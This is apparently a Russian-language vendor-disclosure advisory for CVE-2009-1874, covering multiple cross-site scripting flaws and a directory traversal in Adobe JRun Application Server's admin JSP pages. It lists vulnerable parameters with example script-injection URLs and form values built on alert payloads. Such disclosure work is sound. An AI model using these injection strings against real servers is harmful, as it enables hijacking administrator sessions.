CVE-2009-1874

Вендор

Adobe

Продукт

Adobe JRun Application Server

Тип уязвимости

Множественные уязвимости межсайтового скриптинга

Reported

20.01.2009

Date of Public Advisory

17.08.2009

Детальное описание

Используя обнаруженные уязвимости, злоумышленник может перехватить cookie администратора и выполнять любые действия в системе от его имени. 

Также злоумышленник может прочитать любой файл, используя уязвимость обхода каталога. 

1. Уязвимость межсайтового скриптинга обнаружена в скрипте logviewer.jsp
**************************************************************************************
GET parameters "case", "logfile", "num", "readStart", "reverse", "startAt". 

Пример
*********
http://[server]/server/[profile]/logging/logviewer.jsp?case="><script>alert('DSecRG XSS')</script> 
http://[server]/server/[profile]/logging/logviewer.jsp?logfile=<IMG SRC="javascript:alert('DSecRG XSS');"> 
http://[server]/server/[profile]/logging/logviewer.jsp?readDir=FALSE&readStart=<script>alert('DSecRG XSS')</script> 
http://[server]/server/[profile]/logging/logviewer.jsp?startAt=<script>alert('DSecRG XSS')</script> 

2. Уязвимость межсайтового скриптинга обнаружена в скрипте redeployear.jsp
***************************************************************************************
Уязвимый GET параметр "redeployEar.url". 

Пример
*********
http://[server]/server/[profile]/deployments/redeployear.jsp?redeployEar.url=<script>alert('DSecRG XSS')</script> 

3. Уязвимость межсайтового скриптинга обнаружена в скрипте undeployear.jsp
****************************************************************************************
Уязвимый GET параметр "deployEar.url". 

Пример
*********
http://[server]/server/[profile]/deployments/undeployear.jsp?deployEar.delete=&deployEar.url=<script>alert('DSecRG XSS')</script> 

4. Уязвимость межсайтового скриптинга обнаружена в скрипте deployear.jsp
*************************************************************************************
Уязвимый GET параметр "form.deploymentFilePath". 

Пример
*********
http://[server]/server/[profile]/deployments/deployear.jsp?form.deploymentFilePath="><script>alert('DSecRG XSS')</script> 

5. Уязвимость межсайтового скриптинга обнаружена в скрипте deployejb.jsp
*************************************************************************************
Уязвимый GET параметр "form.deploymentFilePath". 

Пример
*********
http://[server]/server/[profile]/deployments/deployejb.jsp?form.deploymentFilePath="><script>alert('DSecRG XSS')</script> 

6. Уязвимость межсайтового скриптинга обнаружена в скрипте deployrar.jsp
*************************************************************************************
Уязвимый GET параметр "form.deploymentFilePath". 

Пример
*********
http://[server]/server/[profile]/deployments/deployrar.jsp?form.deploymentFilePath="><script>alert('DSecRG XSS')</script> 

7. Уязвимость межсайтового скриптинга обнаружена в скрипте deploywar.jsp
************************************************************************************** 

Уязвимый GET параметр "form.deploymentFilePath". 

Пример
*********
http://[server]/server/[profile]/deployments/deploywar.jsp?form.deploymentFilePath="><script>alert('DSecRG XSS')</script> 

8. Уязвимость хранимого межсайтового скриптинга обнаружена в скрипте jvmsettings.jsp
*************************************************************************************************** 

Уязвимый GET параметр "vmSettings.javaHome", "vmSettings.vmArgs", "vmSettings.classpaths". 

Пример
*********
vmSettings.javaHome="><script>alert('DSecRG XSS')</script> 
vmSettings.vmArgs=</TEXTAREA><script>alert('DSecRG XSS')</script> 
vmSettings.classpaths = <script>alert('DSecRG XSS')</script> 

9. Уязвимость межсайтового скриптинга обнаружена в скрипте overviewwar.jsp
****************************************************************************************
Уязвимый POST параметр "generalSettingsForm.replicationBuddyList", "generalSettingsForm.documentRoot". 

Пример
*********
generalSettingsForm.replicationBuddyList = <script>alert('DSecRG XSS')</script> 
generalSettingsForm.documentRoot = "><script>alert('DSecRG XSS')</script> 

Решение 
**********
Уязвимость была устранена 17 августа 2009 года.